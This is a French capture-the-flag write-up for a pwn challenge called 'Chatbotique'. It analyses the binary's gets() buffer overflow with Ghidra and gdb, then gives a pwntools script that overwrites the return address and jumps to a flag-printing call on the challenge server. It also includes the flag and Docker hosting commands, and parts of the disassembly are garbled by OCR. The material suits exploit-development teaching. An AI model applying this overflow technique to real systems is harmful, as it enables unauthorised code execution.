Chatbotique (MEDIUM)

Auteur(s):

Hokanosekai

Catégorie :

Pwn

Description:

Un étudiant a mis au point un chatbot pour concurrencer ChatGPT, or il a oublié de sécuriser son application. Trouve le flag!

chatbotique

```
nc 161.35.21.37 40013
```

Flag : UHOCTF{Fake flag}

Solution

On peut commencer par lancer la commande file sur le binaire :

```
hoka@hoka ~/c/U/U/P/Chatbotique (main)> file chatbotique chatbotique: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3c300cbb9f4046d259e38576a26c0acdd0100ce9, for GNU/Linux 3.2.0, not stripped
```

Le binaire est un éxécutable 64 bits, dynamiquement linké, non strippé.

Ensuite, on peut lancer le binaire :

```
hoka@hoka ~/c/U/U/P/Chatbotique (main)> ./chatbotique
Bienvenue sur Chatbotique !
Comment puis-je vous aider ?
test
Je suis encore en cours d'apprentissage, je ne comprends pas votre
demande.
```

Lors de l'éxécution, le binaire nous demande une entrée, et nous renvoie une réponse.

Nous allons maintenant regarder le code du binaire avec Ghidra.

```
/* WARNING: Removing unreachable block (ram,0x00401310) */
undefined8 main(void)
  int iVar1;
  char local 108 [256];
  setbuf(stdout,(char *)0x0);
  puts("Bienvenue sur Chatbotique !");
  puts("Comment puis-je vous aider ?");
  gets(local 108);
  iVar1 = strcmp(local 108, "Je voudrais le flag");
  if (iVar1 == 0) {
    puts("Je ne suis pas sur d\'avoir compris votre demande.");
  }
  else {
    iVar1 = strcmp(local 108,&DAT 00402090);
    if (iVar1 == 0) {
     puts(&DAT 004020b8);
    }
    else {
      iVar1 = strcmp(local 108, &DAT 00402108);
      if (iVar1 == 0) {
        puts(&DAT 00402148);
      }
      else {
        iVar1 = strcmp(local 108,&DAT 004021a0);
        if (iVar1 == 0) {
          puts("Bien sur, il vous suffit de me donner votre mot de
passe.");
        }
        else {
          iVar1 = strcmp(local_108, "Donne moi le flag stp");
          if (iVar1 == 0) {
            puts("L\'impolitesse ne paie pas.");
          }
          else {
            iVar1 = strcmp(local_108,&DAT_00402238);
            if (iVar1 == 0) {
              puts(&DAT_00402278);
            }
            else {
              iVar1 = strcmp(local_108, "Pain au chocolat ou Chocolatine
?");
              if (iVar1 != 0) {
                puts("Je suis encore en cours d\'apprentissage, je ne
comprends pas votre demande.")
                    /* WARNING: Subroutine does not return */
                exit(1);
```

On peut voir que le binaire utilise la fonction gets pour récupérer notre entrée, ce qui est une faille de sécurité connue. En effet, cette fonction ne vérifie pas la taille de l'entrée, ce qui peut mener à un buffer overflow.

Nous avons donc notre point d'entrée pour exploiter le binaire, mais nous avons un problème, si aucune des comparaisons n'est validée, le programme se termine, donc juste réécrire rip n'est pas suffisant.

Nous allons donc pouvoir créer un payload commencant par Je voudrais le flag, et suivi d'un bite null $\times 00$ pour terminer la chaine de caractère, puis nous allons pouvoir écrire l'adresse de la fonction puts pour qu'elle soit appelée après la comparaison.

Nous devons maintenant trouver l'offset pour écrire l'adresse de la fonction puts dans le registre rip.

Pour trouver cet offset, il nous suffit de regarder le code décompiler du binaire.

```
char local_108 [256];
```

Cette variable est la première variable initialisée, et par conséquent, la plus proche du registre rbp, qui lui même est devant le registre rip. Notre offset est donc de 256 + 8 = 264. Cela veut dire que le 265ème caractère de notre payload sera écrit dans le registre rip.

Afin de savoir quelle adresse écrire dans le registre rip, nous allons utiliser l'outil gdb.

```
(gdb) disass main
Dump of assembler code for function main:
   0x0000000000401182 <+0>:
                                push
                                        %rbp
   0x0000000000401183 <+1>:
                                mov
                                       %rsp,%rbp
   0 \times 00000000000401186 < +4>:
                                sub
                                        $0x110,%rsp
   0x000000000040118d <+11>:
                                                                # 0×404060
                                mov
                                        0x2ecc(%rip),%rax
<stdout@GLIBC_2.2.5>
   0x0000000000401194 <+18>:
                                        $0x0,%esi
                                mov
   0x0000000000401199 <+23>:
                                mov
                                       %rax,%rdi
   0x000000000040119c <+26>:
                                call
                                        0x401040 <setbuf@plt>
   0x00000000004011a1 <+31>:
                                movl
                                        $0x0, -0x104(%rbp)
```

0x00000000004011ab <+41>:	lea	0xe56(%rip),%rdi	# 0×402008	
0x00000000004011b2 <+48>:	call	0x401030 <puts@plt></puts@plt>		
0x00000000004011b7 <+53>:	lea	0xe66(%rip),%rdi	# 0×402024	
0x00000000004011be <+60>:	call	0x401030 <puts@plt></puts@plt>		
0x00000000004011c3 <+65>:	lea	-0x100(%rbp),%rax		
0x00000000004011ca <+72>:	mov	%rax,%rdi		
0x00000000004011cd <+75>:	mov	\$0x0,%eax		
0x00000000004011d2 <+80>:	call	0x401070 <gets@plt></gets@plt>		
0x00000000004011d7 <+85>:	lea	-0x100(%rbp),%rax		
0x00000000004011de <+92>:	lea	0xe5c(%rip),%rsi	# 0×402041	
0x00000000004011e5 <+99>:	mov	%rax,%rdi		
0x00000000004011e8 <+102>:	call	0x401060 <strcmp@plt></strcmp@plt>		
0x00000000004011ed <+107>:	test	%eax,%eax		
0x00000000004011ef <+109>:	jne	0x401202 <main+128></main+128>		
0×00000000004011f1 <+111>:	lea	0xe60(%rip),%rdi	# 0×402058	
0×00000000004011f8 <+118>:	call	0x401030 <puts@plt></puts@plt>		
0x00000000004011fd <+123>:	jmp -	0x40134e <main+460></main+460>		
0x0000000000401202 <+128>:	lea	-0x100(%rbp),%rax		
0x0000000000401209 <+135>:	lea	0xe80(%rip),%rsi	# 0×402090	
0×0000000000401210 <+142>:	mov	%rax,%rdi		
0x0000000000401213 <+145>:	call	0x401060 <strcmp@plt></strcmp@plt>		
0x0000000000401218 <+150>:	test	%eax,%eax		
0x000000000040121a <+152>:	jne	0x40122d <main+171></main+171>		
0x000000000040121c <+154>:	lea	0xe95(%rip),%rdi	# 0×4020b8	
0x0000000000401223 <+161>:	call	0x401030 <puts@plt></puts@plt>		
0x0000000000401228 <+166>:	jmp	0x40134e <main+460></main+460>		
0×000000000040122d <+171>:	lea	-0x100(%rbp),%rax		
0x0000000000401234 <+178>:	lea	<pre>0xecd(%rip),%rsi</pre>	# 0×402108	
0x000000000040123b <+185>:	mov	%rax,%rdi		
0x000000000040123e <+188>:	call	0x401060 <strcmp@plt></strcmp@plt>		
0x0000000000401243 <+193>:	test	%eax,%eax		
0x0000000000401245 <+195>:	jne	0x401258 <main+214></main+214>	" 0 400140	
0x0000000000401247 <+197>:	lea	<pre>0xefa(%rip),%rdi</pre>	# 0×402148	
0x000000000040124e <+204>:	call	0x401030 <puts@plt></puts@plt>		
0x0000000000401253 <+209>:	jmp	0x40134e <main+460></main+460>		
0x0000000000401258 <+214>:	lea	-0x100(%rbp),%rax	" 0 4001 0	
0x000000000040125f <+221>:	lea	0xf3a(%rip),%rsi	# 0x4021a0	
0x0000000000401266 <+228>:	mov	%rax,%rdi		
0x00000000000401269 <+231>:	call	0x401060 <strcmp@plt></strcmp@plt>		
0x000000000040126e <+236>:	test	%eax,%eax		
0x00000000000401270 <+238>:	jne laa	0x401283 <main+257></main+257>	# 0.4021-0	
0x00000000000401272 <+240>:	lea	0xf4f(%rip),%rdi	# 0×4021c8	
0x00000000000401279 <+247>:	call	0x401030 <puts@plt></puts@plt>		
0x000000000040127e <+252>:	jmp	0x40134e <main+460></main+460>		
0x00000000000401283 <+257>:	lea	-0x100(%rbp),%rax	# 05/402202	
0x000000000040128a <+264>:	lea	0xf71(%rip),%rsi	# 0×402202	
0x00000000000401291 <+271>:	mov	%rax,%rdi		
0x00000000000401294 <+274>:	call	0x401060 <strcmp@plt></strcmp@plt>		
0x00000000000401299 <+279>:	test	%eax,%eax 0x4012ae <main+300></main+300>		
0x000000000040129b <+281>:	jne loa		# 07/02210	
0x0000000000040129d <+283>:	lea call	0xf74(%rip),%rdi	# 0x402218	
0x00000000004012a4 <+290>:		0x401030 <puts@plt> 0x40134e <main+460></main+460></puts@plt>		
0x00000000004012a9 <+295>:	jmp loo			
0x00000000004012ae <+300>:	lea	-0x100(%rbp),%rax		

```
0x00000000004012b5 <+307>:
                                 lea
                                        0xf7c(%rip),%rsi
                                                                 # 0x402238
   0x00000000004012bc <+314>:
                                        %rax,%rdi
                                 mov
                                        0x401060 <strcmp@plt>
   0x00000000004012bf <+317>:
                                 call
   0x00000000004012c4 <+322>:
                                 test
                                        %eax,%eax
   0x00000000004012c6 <+324>:
                                        0x4012d6 < main + 340 >
                                 ine
   0x00000000004012c8 <+326>:
                                 lea
                                        0xfa9(%rip),%rdi
                                                                 # 0x402278
                                        0x401030 <puts@plt>
   0x00000000004012cf <+333>:
                                 call
   0x00000000004012d4 <+338>:
                                 jmp
                                        0x40134e < main + 460 >
   0 \times 0000000000004012d6 < +340>:
                                 lea
                                        -0x100(%rbp),%rax
   0 \times 0000000000004012dd < +347>:
                                 lea
                                        0x1004(%rip),%rsi
                                                                 # 0x4022e8
   0x00000000004012e4 <+354>:
                                 mov
                                        %rax,%rdi
   0x00000000004012e7 <+357>:
                                        0x401060 <strcmp@plt>
                                 call
   0x00000000004012ec <+362>:
                                 test
                                        %eax,%eax
   0x00000000004012ee <+364>:
                                 jne
                                        0x401338 <main+438>
   0x00000000004012f0 <+366>:
                                        0x1019(%rip),%rdi
                                                                  # 0x402310
                                 lea
   0x00000000004012f7 <+373>:
                                 call
                                        0x401030 <puts@plt>
   0x00000000004012fc <+378>:
                                 mov
                                        $0x14,%edi
   0x0000000000401301 <+383>:
                                        0x401090 <sleep@plt>
                                 call
   0x0000000000401306 <+388>:
                                 mov
                                        -0x104(%rbp),%eax
   0x000000000040130c <+394>:
                                 test
                                        %eax,%eax
   0x000000000040130e <+396>:
                                 jе
                                        0x40132a <main+424>
   0x0000000000401310 <+398>:
                                 lea
                                        0x1021(%rip),%rdi
                                                                  # 0x402338
   0x0000000000401317 <+405>:
                                 call
                                        0x401030 <puts@plt>
   0x000000000040131c <+410>:
                                        0x1037(%rip),%rdi
                                                                  # 0x40235a
                                 lea
   0x0000000000401323 <+417>:
                                 call
                                        0x401050 < system@plt>
   0x0000000000401328 <+422>:
                                 jmp
                                        0x40134e < main + 460 >
   0x000000000040132a <+424>:
                                 lea
                                        0x1037(%rip),%rdi
                                                                  # 0x402368
   0x0000000000401331 <+431>:
                                 call
                                        0x401030 <puts@plt>
                                        0x40134e <main+460>
   0x0000000000401336 <+436>:
                                 jmp
   0x0000000000401338 <+438>:
                                 lea
                                        0x1059(%rip),%rdi
                                                                  # 0x402398
   0x000000000040133f <+445>:
                                 call
                                        0x401030 <puts@plt>
   0x0000000000401344 <+450>:
                                 mov
                                        $0x1,%edi
                                        0x401080 <exit@plt>
   0x0000000000401349 <+455>:
                                 call
   0x000000000040134e <+460>:
                                 mov
                                        $0x0,%eax
   0 \times 000000000000401353 < +465>:
                                 leave
   0x0000000000401354 <+466>:
                                 ret
End of assembler dump.
```

Grâce à ce dump, nous pouvons trouver à quel puts il faut sauter pour avoir le flag.(Celui qui est juste avant le system)

```
0x000000000401317 <+405>: call 0x401030 <puts@plt>
```

Nous pouvons maintenant tester en utilisant la libraire pwntools:

```
from pwn import *
exe = ELF("./chatbotique", checksec=False)
```

```
context.binary = exe
def conn():
    print(args)
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r)
    else:
        r = remote("161.35.21.37", 40013)
    return r
def main():
    r = conn()
    r.recv()
    condition = b"Je voudrais le flag\x00"
    junk = b"A" * (0x100 - len(condition))
    rbp = b"B" * 0x8
    rip = p64(0x00401317)
    payload = condition + junk + rbp + rip
    print(payload)
    r.sendline(payload)
    print(r.recvall().decode().split("\n")[2])
if __name__ == "__main__":
    main()
```

Lorsque nous lançons le script en local, nous obtenons le flag:

Maintenant, nous pouvons lancer le script en remote:

Il faut penser à ajouter un autre <u>recv</u> pour recevoir la seconde ligne affichée lors de la connexion.

Flag : UHOCTF{Ch4tGPT_15_u53l355_f0r_buff3r_0v3rfl0w}

Hosting

```
sudo docker build -t chatbotique .
sudo docker network create -d bridge chatbotique
```

The command to start the challenge is:

```
sudo docker run -p 40013:40013 --detach --name chatbotique --network chatbotique chatbotique:latest
```

The command to stop the challenge (since CTRL+C won't work) is:

sudo docker stop chatbotique